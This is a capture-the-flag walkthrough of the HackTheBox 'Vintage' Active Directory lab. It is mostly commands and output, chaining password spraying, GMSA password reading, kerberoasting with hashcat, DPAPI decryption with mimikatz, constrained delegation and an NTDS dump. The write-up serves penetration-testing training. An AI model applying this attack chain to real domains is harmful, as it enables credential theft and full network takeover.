Enumeration
As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123
Nmap Scan
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49670/tcp open unknown
49681/tcp open unknown
49689/tcp open unknown
49708/tcp open unknown
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV 10.129.124.148 -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Active Directory LDAP (Domain: vintage.htb)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Active Directory LDAP (Domain: vintage.htb)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) Summary
Copy * Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985
* Services: DNS - KERBEROS - RPC - LDAP - LDAPS - SMB - winRM
* Important notes: Domain: vintage.htb hosts file
Update the hosts file to avoid encountering any issues when authenticating to the domain
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $sudo sh -c "echo '10.129.124.148 dc01 vintage.htb dc01.vintage.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $tail -n1 /etc/hosts
10.129.124.148 dc01 vintage.htb dc01.vintage.htb DNS Enumeration
Zone transfer failed
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $dig axfr @$ip vintange.htb
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.129.124.148 vintange.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $dig axfr @$ip dc01.vintange.htb
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.129.124.148 dc01.vintange.htb
; (1 server found)
;; global options: +cmd
; Transfer failed. RPC & SMB Enumeration
Every time I connect to rpc With invalid credentials, it gives me Access_denied But this weird error message is unique this time:
Copy ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $rpcclient -U "%" $ip -c enumdomusers
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED The same thing with SMB using netexec
Kerberos & LDAP Enumeration
NT_STATUS_NOT_SUPPORTED flag means NTLM authentication is disabled, so I have to use kerberos authentication instead.
Copy ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u P.Rosa -p Rosaisbest123 -d vintage.htb -k --admin-count
LDAP dc01 389 dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123
LDAP dc01 389 dc01.vintage.htb Administrator
LDAP dc01 389 dc01.vintage.htb Administrators
LDAP dc01 389 dc01.vintage.htb Print Operators
LDAP dc01 389 dc01.vintage.htb Backup Operators
LDAP dc01 389 dc01.vintage.htb Replicator
LDAP dc01 389 dc01.vintage.htb L.Bianchi_adm I will note L.Bianchi_adm The user is a high-value target in my notes, then continue enumerating.
Getting all users in the domain and their description field
Checking for PKI, LDAP signing and Machine Account Qouta
Copy ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u P.Rosa -p Rosaisbest123 -d vintage.htb -k -M adcs -M ldap-checker -M maq
LDAP dc01 389 dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123
ADCS dc01 389 dc01.vintage.htb [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
LDAP-CHE... dc01 389 dc01.vintage.htb [-] [Errno -2] Name or service not known
LDAP-CHE... dc01 389 dc01.vintage.htb LDAP Signing NOT Enforced!
MAQ dc01 389 dc01.vintage.htb [*] Getting the MachineAccountQuota
MAQ dc01 389 dc01.vintage.htb MachineAccountQuota: 0 Password Reuse failed
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u users.list -p Rosaisbest123 -d vintage.htb -k --continue-on-success
LDAP dc01 389 dc01.vintage.htb [*] x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\L.Bianchi_adm:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\C.Neri_adm:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\svc_ark:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\svc_ldap:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\svc_sql:Rosaisbest123 KDC_ERR_CLIENT_REVOKED
LDAP dc01 389 dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\C.Neri:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\G.Viola:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\L.Bianchi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\R.Verdi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\M.Rossi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED With a domain user credential, I can use bloodhound.py and dump ldap data for further enumeration, then ingesting the zip file into bloodhoud CE
`FS01` is a member of PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB
From the post, computer assigned with pre-windows 2000 attribute has the password of its lowercase name
Confirming it with netexec
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap 10.129.232.23 -u 'fs01$' -p fs01 -k
LDAP 10.129.232.23 389 dc01.vintage.htb [+] vintage.htb\fs01$:fs01 With fs01$ computer account, I can extract GMSA secret hash due to ReadGMSAPassword privilege
First, get a Kerberos ticket for fs01$ and then provide it to KRB5CCNAME variable to extract the GMSA secrets with bloodyAD
Copy ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $kinit 'fs01$'
Password for fs01$@VINTAGE.HTB: fs01
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: fs01$@VINTAGE.HTB
Valid starting Expires Service principal
12/01/2024 09:23:42 12/01/2024 19:23:42 krbtgt/VINTAGE.HTB@VINTAGE.HTB
renew until 12/02/2024 09:23:40
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=/tmp/krb5cc_1000 bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k get object 'GMSA01$' --attr msDS-ManagedPassword
distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7axxxxxxxxxxxxxxx
msDS-ManagedPassword.B64ENCODED: c6qwf6x+EXiEYKGhCu/wTBcnxxxxxxxxxxxxxxxxxxxxxxCaIhn2MobwBxF4Q6fd3W5P13wvh2Jf/Wp2WHsjIEjkbF0duDHoCBAK31Q+BoQg0eUHbsRcksNrkLcPtkZ5eUhK+TzgpXeFKt0VCOWFkAOStKE1H5PDfUGoC2xuP+Tceg7iV0IcMBaR8Db3UgqaqP2LLRiimuL6ZO4xl6sSRKrdRQEQOR7L9fFw9JW7myCsbj2TPxFc5WaMQtWi456OvwBQn4jhdty5tSjv2uMlcq+sQMz60voxH6sClACPGKJMCr2FNVJP6dd1GTdvh6n5Dbh/yhHCAF8UzYeGXv2Nx3Dw== Get a Kerberos ticket for GMSA01$ the account.
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $impacket-getTGT vintage.htb/'gmsa01$'@dc01 -hashes :54311f0ed05b807a7aaf5943b595f224
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in gmsa01$@dc01.ccache GMSA01$ can add itself or any user to Service Managers group, so I will add P.Rosa to that group because I have his password and it's easy to move when you have a password :))
Copy ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=`pwd`/'gmsa01$@dc01.ccache' bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" P.Rosa
[+] P.Rosa added to CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB Membership in service managers Group grants me the ability to change the password of three service users or assign a fake SPN to them
Trying to perform targetkerberos against svc_sql account and enable it because I can't request Service Ticket (ST) for disabled accounts
Using PowerView.py I can enable the account, then assign a SPN for it
Copy (LDAP)-[dc01.vintage.htb]-[VINTAGE\P.Rosa]
PV > Set-DomainObject -Identity svc_sql -Set serviceprincipalname='service/dc01.vintage.htb'
[2024-12-01 10:13:49] [Set-DomainObject] Success! modified attribute serviceprincipalname for CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb
(LDAP)-[dc01.vintage.htb]-[VINTAGE\P.Rosa]
PV > Set-DomainObject -Identity svc_sql -Set userAccountControl=512
[2024-12-01 10:18:27] [Set-DomainObject] Success! modified attribute useraccountcontrol for CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb Perform a kerberoasting attack
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u p.rosa -p Rosaisbest123 -k --kerberoasting kerberos.hash
LDAP dc01 389 dc01.vintage.htb [+] vintage.htb\p.rosa:Rosaisbest123
LDAP dc01 389 dc01.vintage.htb Bypassing disabled account krbtgt
LDAP dc01 389 dc01.vintage.htb [*] Total of records returned 1
LDAP dc01 389 dc01.vintage.htb sAMAccountName: svc_sql memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb pwdLastSet: 2024-12-01 10:12:04.583550 lastLogon:<never>
LDAP dc01 389 dc01.vintage.htb $krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$blob... Crack the hash
Copy ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $hashcat -m 13100 kerberos.hash /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$5c8b7f808a8cf1a4eb8cdc495b8f71b9$13310d68a29e5f44f74d55c066d19a6d3f187906b54c866fd860784de403813e9a8772ec270e8734b4d89d04dc51a4e569c92beac67729b043471fe387c8659a945e9893e3ebafe0b97e6e8ee912354186321c1029a5b9aca893aa5a6e2197493250e38b1ef7a0cc554b70dc16da09d29207172e7ef3715a41c5f36ce3d5bc6801a5ff7a382c0217e43c2f8daaf84e742e17a..snip..5:Zerxxxxxxx
Session..........: hashcat
Status...........: Cracked Spraying the password reveals that C.Neri has the same one
Since C.Neri is in Remote Management UsersI will access the machine with evil-winrm but first get kerberos ticket for him.
To perform kerberos authentication from Linux, you must configure /etc/krb5.conf first
Copy [libdefaults]
default_realm = VINTAGE.HTB
[realms]
VINTAGE.HTB = {
kdc = dc01.vintage.htb
admin_server = dc01.vintage.htb
default_domain = vintage.htb
}
[domain_realm]
.vintage.htb = VINTAGE.HTB
vintage.htb = VINTAGE.HTB
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $kinit C.Neri
Password for C.Neri@VINTAGE.HTB:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: C.Neri@VINTAGE.HTB
Valid starting Expires Service principal
12/01/2024 10:27:07 12/01/2024 20:27:07 krbtgt/VINTAGE.HTB@VINTAGE.HTB
renew until 12/02/2024 10:27:02 Access the machine via winRM using Kerberos authentication
Copy ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=/tmp/krb5cc_1000 evil-winrm -i dc01 -r vintage.htb
*Evil-WinRM* PS C:\Users\C.Neri\Desktop> type user.txt
35cb0ccde18da32e0366xxxxxxxxxxxxxxxxx User Flag: 35cb0ccde18da32e0366xxxxxxxxxxxxxxxxx
Lateral Movement
Inside C.Neri folder, there are DPAPI-encrypted credentials
DPAPI stands for Data Protected API which is Microsoft encryption mechanism. It can be decrypted by the user's password who encrypt it and his masterkey
Normal Location of DPAPI:
%USERPROFILE%\AppData\Roaming\Microsoft\Credentials
%USERPROFILE%\AppData\LOCAL\Microsoft\Credentials
The master key Location:
%USERPROFILE%\AppData\Roaming\Microsoft\Protect\SID\
Copy JokerShell C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> ls -Force
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 6/7/2024 5:08 PM 430 C4BB96844A5C9DD45D5B6A9859252BA6 We can either encode this encrypted credential by base64 encoding, then transfer to our windows VM along with the master keys to decrypt it locally.
After doing so, we can use mimikatz.exe with dpapi::masterkey first to get the master key, then with dpapi::cred to extract the credential with the obtained master key.
Copy dpapi::masterkey /in:C:\Users\Dark_Man\Downloads\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 /sid:S-1-5-21-4024337825-2033394866-2055507597-1115 /password:Zerxxxxxxx /protected
dpapi::masterkey /in:C:\Users\Dark_Man\Downloads\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b /sid:S-1-5-21-4024337825-2033394866-2055507597-1115 /password:Zerxxxxxxx /protected
[masterkey] with password: Zerxxxxxxx (protected user)
key : 55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
sha1: 637b40612daf4b1bd99785833479898aeb6d9739
dpapi::cred /in:C:\Users\Dark_Man\Downloads\C4BB96844A5C9DD45D5B6A9859252BA6 /masterkey:55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
Decrypting Credential:
* masterkey : 55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000da - 218
credUnk0 : 00000000 - 0
Type : 00000001 - 1 - generic
Flags : 00000000 - 0
LastWritten : 6/7/2024 3:08:23 PM
unkFlagsOrSize : 00000030 - 48
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : LegacyGeneric:target=admin_acc
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : vintage\c.neri_adm
CredentialBlob : Uncr4ckxxxxxxxxxxxd0312
Attributes : 0 Privilege Escalation
Attack Explain:
With GenericWrite on DELEGATEDADMINS, I can add any user to this group
With DELEGATEDADMINS privileges, I can perform Constrained Delegation and request a ticket for CIFS
With this ticket, I can dump NTDS.DIT database with secretdump.py
This is a script running on the box resetting any change made by players, So I will put the steps we did before here to make things fast.
Adding P.Rosa to SERVICEMANAGERS groups (Previous Step)
Copy KRB5CCNAME=`pwd`/'gmsa01$@dc01.ccache' bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" P.Rosa Set SPN to svc_sql With proper syntax Service/FQDN and enable the account if it's disabled again
Copy Set-DomainObject -Identity svc_sql -Set userAccountControl=512
Set-DomainObject -Identity svc_sql -Set serviceprincipalname='MSSQLSvc/dc01.vintage.htb'
OR
KRB5CCNAME=`pwd`/p.rosa.ccache bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k set object 'SVC_SQL' servicePrincipalName -v 'MSSQLSvc/dc01.vintage.htb' Abuse GenericWriteprivileges
Copy KRB5CCNAME=`pwd`/c.neri_adm.ccache bloodyAD -k --host dc01.vintage.htb --dc-ip dc01 -d 'VINTAGE.HTB' add groupMember 'DELEGATEDADMINS' 'svc_sql' Perform Constrained Delegation attack
Copy getST.py -spn 'cifs/dc01.vintage.htb' -impersonate 'dc01$' 'vintage.htb/svc_sql':'Zerxxxxxxx' -k Export the ticket to KRB5CCNAME and dump ntds using netexec
Note: I will use L.BIANCHI_ADM DA user instead of normal Administrator user.
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc smb dc01 -d vintage.htb -k --use-kcache --ntds --user L.BIANCHI_ADM
SMB dc01 445 dc01 [+] vintage.htb\dc01$ from ccache
SMB dc01 445 dc01 L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:8e83e02f54e85de52xxxxxxxxxxxx4:::
impacket-getTGT vintage.htb/l.bianchi_adm@dc01 -hashes :8e83e02f54e85dexxxxxxxxxxxxx
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc smb dc01 -k --use-kcache -d vintage.htb
SMB dc01 445 dc01 [+] vintage.htb\l.bianchi_adm from ccache (Pwn3d!)
Copy ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $evil-winrm -i dc01 -r vintage.htb
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a35039cb0106fdd70bcxxxxxxxxxxxxxx Root Flag: a35039cb0106fdd70bcxxxxxxxxxxxxxx
